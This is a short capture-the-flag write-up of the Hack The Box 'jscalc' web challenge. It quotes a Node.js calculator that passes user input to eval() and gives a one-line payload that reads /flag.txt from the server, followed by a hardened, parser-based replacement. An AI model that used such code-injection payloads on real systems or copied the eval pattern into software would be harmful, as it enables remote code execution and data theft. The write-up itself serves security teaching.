jscalc

Posted on Sat 28 December 2024 in HTB challenge

This is a writeup of the jscalc challenge which is a web challenge from Hack The Box.

The vulnerable code can be found in calculatorHelper.js

module.exports = {
    calculate(formula) {
        try {
            // `formula` comes straight from the request and is interpolated
            // into the source string that eval() executes, so any JavaScript
            // expression the user submits runs inside the Node.js process.
            return eval(`(function() { return ${ formula } ;}())`);

        } catch (e) {
            // Only syntax errors are handled; any other exception leaves
            // calculate() returning undefined.
            if (e instanceof SyntaxError) {
                return 'Something went wrong!';
            }
        }
    }
}

The formula comes directly from the user, so entering the following formula reads the flag:

require("fs").readFileSync("/flag.txt").toString()


This results in the following flag:

HTB{c4lcul4t3d_my_w4y_thr0ugh_rc3}
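The root cause is that the calculator hands user text to eval(). Below is an added example (my own code, not part of the challenge or the writeup) of a calculate() that parses arithmetic itself with a small recursive-descent parser, so a formula like `require("fs")` is rejected as a syntax error instead of being executed.

```javascript
// Hardened calculate(): accepts only numbers, + - * / ( ) and unary minus.
// Sticky regex: each match must start exactly at lastIndex.
const TOKEN = /\s*(?:(\d+(?:\.\d+)?)|([-+*\/()]))/y;

function tokenize(formula) {
  const tokens = [];
  let pos = 0;
  while (pos < formula.length) {
    TOKEN.lastIndex = pos;
    const m = TOKEN.exec(formula);
    if (!m) throw new SyntaxError(`unexpected input at offset ${pos}`);
    pos = TOKEN.lastIndex;
    if (m[1] !== undefined) tokens.push({ type: 'num', value: Number(m[1]) });
    else tokens.push({ type: 'op', value: m[2] });
  }
  return tokens;
}

function parse(tokens) {
  let i = 0;
  const peek = () => tokens[i];
  const expr = () => {            // expr := term (('+'|'-') term)*
    let v = term();
    while (peek() && (peek().value === '+' || peek().value === '-')) {
      const op = tokens[i++].value;
      const r = term();
      v = op === '+' ? v + r : v - r;
    }
    return v;
  };
  const term = () => {            // term := factor (('*'|'/') factor)*
    let v = factor();
    while (peek() && (peek().value === '*' || peek().value === '/')) {
      const op = tokens[i++].value;
      const r = factor();
      v = op === '*' ? v * r : v / r;
    }
    return v;
  };
  const factor = () => {          // factor := num | '-' factor | '(' expr ')'
    const t = tokens[i++];
    if (!t) throw new SyntaxError('unexpected end of formula');
    if (t.type === 'num') return t.value;
    if (t.value === '-') return -factor();
    if (t.value === '(') {
      const v = expr();
      if (!peek() || tokens[i++].value !== ')') throw new SyntaxError('missing )');
      return v;
    }
    throw new SyntaxError(`unexpected token ${t.value}`);
  };
  const v = expr();
  if (i !== tokens.length) throw new SyntaxError('trailing input');
  return v;
}

// Same interface and error message as the original helper, but no eval().
function safeCalculate(formula) {
  try {
    return parse(tokenize(String(formula).trim()));
  } catch (e) {
    if (e instanceof SyntaxError) return 'Something went wrong!';
    throw e;
  }
}
```

Because the grammar has no identifiers, member access or calls, there is no code path by which input reaches `require`, `process` or any other runtime object.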

web